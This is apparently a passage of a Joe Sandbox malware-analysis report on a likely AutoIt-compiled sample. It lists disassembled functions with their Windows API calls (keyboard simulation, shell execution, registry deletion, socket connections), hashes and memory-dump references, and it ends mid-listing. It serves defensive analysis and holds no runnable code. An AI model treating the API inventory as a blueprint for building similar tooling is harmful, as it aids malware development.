Opcode Fuzzy Hash: 8eae838165388b278e9b8b26d64539548f3be0fba50b5149df617db246d32d2b
Instruction Fuzzy Hash: 2781E371508300ABEB11EF28CC82E6EB7E9AF84714F00491DF5959B2D2DB79ED45CB92

Function 00F91424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea20c771ffebad88c78db6c4877f65438fc0764045e651224f4c6b72db1057a0
Instruction ID: 02ce14ba61096af200f97675edbc517cb65cf802905c660e484088ecca21ffca
Opcode Fuzzy Hash: ea20c771ffebad88c78db6c4877f65438fc0764045e651224f4c6b72db1057a0
Instruction Fuzzy Hash: 6F718D3590010AEFDF14DF98CC49EBEBB78FF8A320F248159F915AA251C734AA51DB60

Function 0101B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00AA67A8), ref: 0101B3EB
IsWindowEnabled.USER32(00AA67A8), ref: 0101B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0101B4DB
SendMessageW.USER32(00AA67A8,000000B0,?,?), ref: 0101B512
IsDlgButtonChecked.USER32(?,?), ref: 0101B54F
GetWindowLongW.USER32(00AA67A8,000000EC), ref: 0101B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0101B589

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3c6ee94f9d5072e95659d084cf83b46344da6d309af21ce0d14666e547f19e74
Instruction ID: 8382f48ce073d63c19115b5d91a69e329d5b1d64d861945be6a163c6fde767f6
Opcode Fuzzy Hash: 3c6ee94f9d5072e95659d084cf83b46344da6d309af21ce0d14666e547f19e74
Instruction Fuzzy Hash: 3A718038640205AFEB619F69C894FBA7BF5FF09310F048499FAC597259CB3AA950CB50

Function 0100F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100F448
_memset.LIBCMT ref: 0100F511
ShellExecuteExW.SHELL32(?), ref: 0100F556

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

GetProcessId.KERNEL32(00000000), ref: 0100F5CD
CloseHandle.KERNEL32(00000000), ref: 0100F5FC

Strings

@, xrefs: 0100F525

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 45e278c640dda038ff77c8fc2225afb351645504722b1a53a9eb7e77b17d9116
Instruction ID: c1a226d49b1654fd44586e021e7f1d80ebc4f5a19e2d9b4d903f7ae094b05332
Opcode Fuzzy Hash: 45e278c640dda038ff77c8fc2225afb351645504722b1a53a9eb7e77b17d9116
Instruction Fuzzy Hash: B561AD70A0061A9FEF15EF68C8819AEBBF5FF48310F15805DE855AB391CB35AD41DB80

Function 00FF0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FF0F8C
GetKeyboardState.USER32(?), ref: 00FF0FA1
SetKeyboardState.USER32(?), ref: 00FF1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00FF1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00FF104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00FF1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FF10B8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bc26d0540ade0397344de82f8a3f63548dd921ec503e34c12320858fb46a9ff4
Instruction ID: 71172d7cdec0971f026d4f902a8685ba7ad3fdeb188a3a04bbf1f7ed0399ce93
Opcode Fuzzy Hash: bc26d0540ade0397344de82f8a3f63548dd921ec503e34c12320858fb46a9ff4
Instruction Fuzzy Hash: B7510660A047D9BDFB3642348C05BB6BEA96F06324F08858DE3D5958E3C6D9DCC8E751

Function 00FF0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00FF0DA5
GetKeyboardState.USER32(?), ref: 00FF0DBA
SetKeyboardState.USER32(?), ref: 00FF0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FF0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FF0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FF0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FF0EC9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f6b01f71218f41de5cbbfdf04c530f3e299022719e1e012cdcb232cca6e8b654
Instruction ID: 793268c9f0eac49e3a3a847eff599d51e63fb55910c2ffa9bd67cf51099063fd
Opcode Fuzzy Hash: f6b01f71218f41de5cbbfdf04c530f3e299022719e1e012cdcb232cca6e8b654
Instruction Fuzzy Hash: 965108A0A047D97DFB3286748C45B7ABFA96F06310F088889F2D4564E3DB95AC98F750

Function 00FF55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00FF560A
_wcsncpy.LIBCMT ref: 00FF563F
_wcsncpy.LIBCMT ref: 00FF5671
_wcsncpy.LIBCMT ref: 00FF56A4
_wcsncpy.LIBCMT ref: 00FF56E6
_wcsncpy.LIBCMT ref: 00FF5720
_wcsncpy.LIBCMT ref: 00FF574F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: ea0900d4e71d7e2179c9e9db9eedaa8d6cd521c2cd82ad756810e4cc94b8de16
Instruction ID: cf0d7f97079d7e1e24152893341178908fa42f0b4f02c22c0edd3f2ffdd1ab41
Opcode Fuzzy Hash: ea0900d4e71d7e2179c9e9db9eedaa8d6cd521c2cd82ad756810e4cc94b8de16
Instruction Fuzzy Hash: 1941D566C1021876CB11FBB58C469DFB3B89F04310F508956E619E3221FB38A345DBE6

Function 00FF3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3697,?), ref: 00FF468B

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3697,?), ref: 00FF46A4

lstrcmpiW.KERNEL32(?,?), ref: 00FF36B7
_wcscmp.LIBCMT ref: 00FF36D3
MoveFileW.KERNEL32(?,?), ref: 00FF36EB
_wcscat.LIBCMT ref: 00FF3733
SHFileOperationW.SHELL32(?), ref: 00FF379F

Strings

\*.*, xrefs: 00FF372D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 82e23961a66b37e4813fe4589e84114e37727d32afe0c2b56a2df8034355f640
Instruction ID: 74ab952208fbad4795bbc48dd0692df29bcc366f1d897aae1f2089c87d23d013
Opcode Fuzzy Hash: 82e23961a66b37e4813fe4589e84114e37727d32afe0c2b56a2df8034355f640
Instruction Fuzzy Hash: 5F41B672508349AEC752EF64C8419EF77E8AF88350F00092EF599C3161EB38D689DB52

Function 01017291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010172AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017351
IsMenu.USER32(?), ref: 01017369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010173B1
DrawMenuBar.USER32 ref: 010173C4

Strings

0, xrefs: 0101729E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 6cb01649b0b8066d06490b6c8a862b6e435a5bb90389c8af516050ccffa2a0f9
Instruction ID: 57ffa86c843b123cadc5e2353b4337766b2fcf85c8b5780dda049142a0ddb01d
Opcode Fuzzy Hash: 6cb01649b0b8066d06490b6c8a862b6e435a5bb90389c8af516050ccffa2a0f9
Instruction Fuzzy Hash: 41417975A00209EFDB20DF54D885EAABBF8FF08310F14846AFE85A7254D739A900CF60

Function 01010FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01010FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01010FFE
FreeLibrary.KERNEL32(00000000), ref: 010110B5

Part of subcall function 01010FA5: RegCloseKey.ADVAPI32(?), ref: 0101101B
Part of subcall function 01010FA5: FreeLibrary.KERNEL32(?), ref: 0101106D
Part of subcall function 01010FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01011090

RegDeleteKeyW.ADVAPI32(?,?), ref: 01011058

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b6e031976fcf49ff6adf87865e4eb2313553e112089c3c33fcfd88682a24a14e
Instruction ID: 5699ac092012bd72f9d392173d467dada02c5130a6c4aa637d1cd3d77f06cb87
Opcode Fuzzy Hash: b6e031976fcf49ff6adf87865e4eb2313553e112089c3c33fcfd88682a24a14e
Instruction Fuzzy Hash: CD310371E01109BFEB66DFA4D885EFFB7BCEF04300F000169F645A2144D7799A499B60

Function 010162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010162EC
GetWindowLongW.USER32(00AA67A8,000000F0), ref: 0101631F
GetWindowLongW.USER32(00AA67A8,000000F0), ref: 01016354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01016386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010163B0
GetWindowLongW.USER32(00000000,000000F0), ref: 010163C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010163DB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d81fe87e0c965b9343b8ec552e4bd958dd89dcf0d21bf4598250783c99f52a04
Instruction ID: 03a21f7384a26b3ce0036a23b434db1b678fc1968246f60ee3c6e513245feebc
Opcode Fuzzy Hash: d81fe87e0c965b9343b8ec552e4bd958dd89dcf0d21bf4598250783c99f52a04
Instruction Fuzzy Hash: FF313934600241AFDB21CF29DC84F6537E1FB49714F1981A4F5809F2BACBBBA844CB50

Function 00FEDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDB54
SysAllocString.OLEAUT32(00000000), ref: 00FEDB57
SysAllocString.OLEAUT32(?), ref: 00FEDB75
SysFreeString.OLEAUT32(?), ref: 00FEDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00FEDBA3
SysAllocString.OLEAUT32(?), ref: 00FEDBB1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ec1c35248e1e1c5a28bd6d0e8d1d929ad89b187b79124c83f07f22b96deed6af
Instruction ID: a5f9b2135c5749d3a54e876beca6c905d81a498c627ce3912ea6d6c991d4a334
Opcode Fuzzy Hash: ec1c35248e1e1c5a28bd6d0e8d1d929ad89b187b79124c83f07f22b96deed6af
Instruction Fuzzy Hash: 6121C43660121AAFDF10EEA9DC88CBB73ACFB49360B018125F954DB290EB78DC459760

Function 01006173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01007D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01007DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010061C6
WSAGetLastError.WSOCK32(00000000), ref: 010061D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0100620E
connect.WSOCK32(00000000,?,00000010), ref: 01006217
WSAGetLastError.WSOCK32 ref: 01006221
closesocket.WSOCK32(00000000), ref: 0100624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01006263

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: e2d8f0f93e21fb5c7d427176dd42bb35d268c37bfd323d7ebaf1ef7cbc7a34a5
Instruction ID: a658cbd2796ce2b7944ce8cf4aff7deedacc05387fcab29107bcbe5e2bffd379
Opcode Fuzzy Hash: e2d8f0f93e21fb5c7d427176dd42bb35d268c37bfd323d7ebaf1ef7cbc7a34a5
Instruction Fuzzy Hash: 6D31C431600118ABEF11AF68CC85BBE7BADEF45750F044059FD85D72C1DB79A8188B61

Function 00FEF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FEF671
__wcsnicmp.LIBCMT ref: 00FEF692
__wcsnicmp.LIBCMT ref: 00FEF6AC

Strings

#notrayicon, xrefs: 00FEF669
#requireadmin, xrefs: 00FEF68C
#OnAutoItStartRegister, xrefs: 00FEF6A6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 73e8fcbd7d3367e58d0ad75ff13842b9f79d5e8823044689b193824793f96796
Instruction ID: d23d9d6eba2cc687756c0955b4f6b389fa6d573a8ad31ef417fb14e462f2c823
Opcode Fuzzy Hash: 73e8fcbd7d3367e58d0ad75ff13842b9f79d5e8823044689b193824793f96796
Instruction Fuzzy Hash: 3621797361419167D730A637AC02FB77399EF55360F104039F482CA051EF649D89F294

Function 00FEDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEDC2F
SysAllocString.OLEAUT32(00000000), ref: 00FEDC32
SysAllocString.OLEAUT32 ref: 00FEDC53
SysFreeString.OLEAUT32 ref: 00FEDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00FEDC76
SysAllocString.OLEAUT32(?), ref: 00FEDC84

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0ab4081fcde34bb2b33d31e7c5d8697880b7be0c07c1ce965176136ed82a83c9
Instruction ID: c0e18863f5d9ff63a054c7e47820f5af8866e4f704df4d6ee2db41eb4132d026
Opcode Fuzzy Hash: 0ab4081fcde34bb2b33d31e7c5d8697880b7be0c07c1ce965176136ed82a83c9
Instruction Fuzzy Hash: 3621B636604245AFDB10EFADDC88DAB77ECEB08360B108125F954CB254DB79EC45DB64

Function 010175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01017632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0101763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0101764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01017659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01017665

Strings

Msctls_Progress32, xrefs: 01017603

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0f8d848335f1464cf5d49939533159050f6db75421a98c491cc475aa389d8616
Instruction ID: ac6a7b35d1f282783158ecaf5a89868a1798d870b4197a62883165da02f3ed1e
Opcode Fuzzy Hash: 0f8d848335f1464cf5d49939533159050f6db75421a98c491cc475aa389d8616
Instruction Fuzzy Hash: 9811B2B211021ABFEF158F64CC85EEB7F6DFF0C798F014115BA44A6054CA769C21DBA4

Function 00FB9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00FB9AE6

Part of subcall function 00FB3187: EncodePointer.KERNEL32(00000000), ref: 00FB318A
Part of subcall function 00FB3187: __initp_misc_winsig.LIBCMT ref: 00FB31A5
Part of subcall function 00FB3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FB9EA0
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FB9EB4
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FB9EC7
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FB9EDA
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FB9EED
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FB9F00
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FB9F13
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FB9F26
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FB9F39
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FB9F4C
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FB9F5F
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FB9F72
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FB9F85
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FB9F98
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FB9FAB
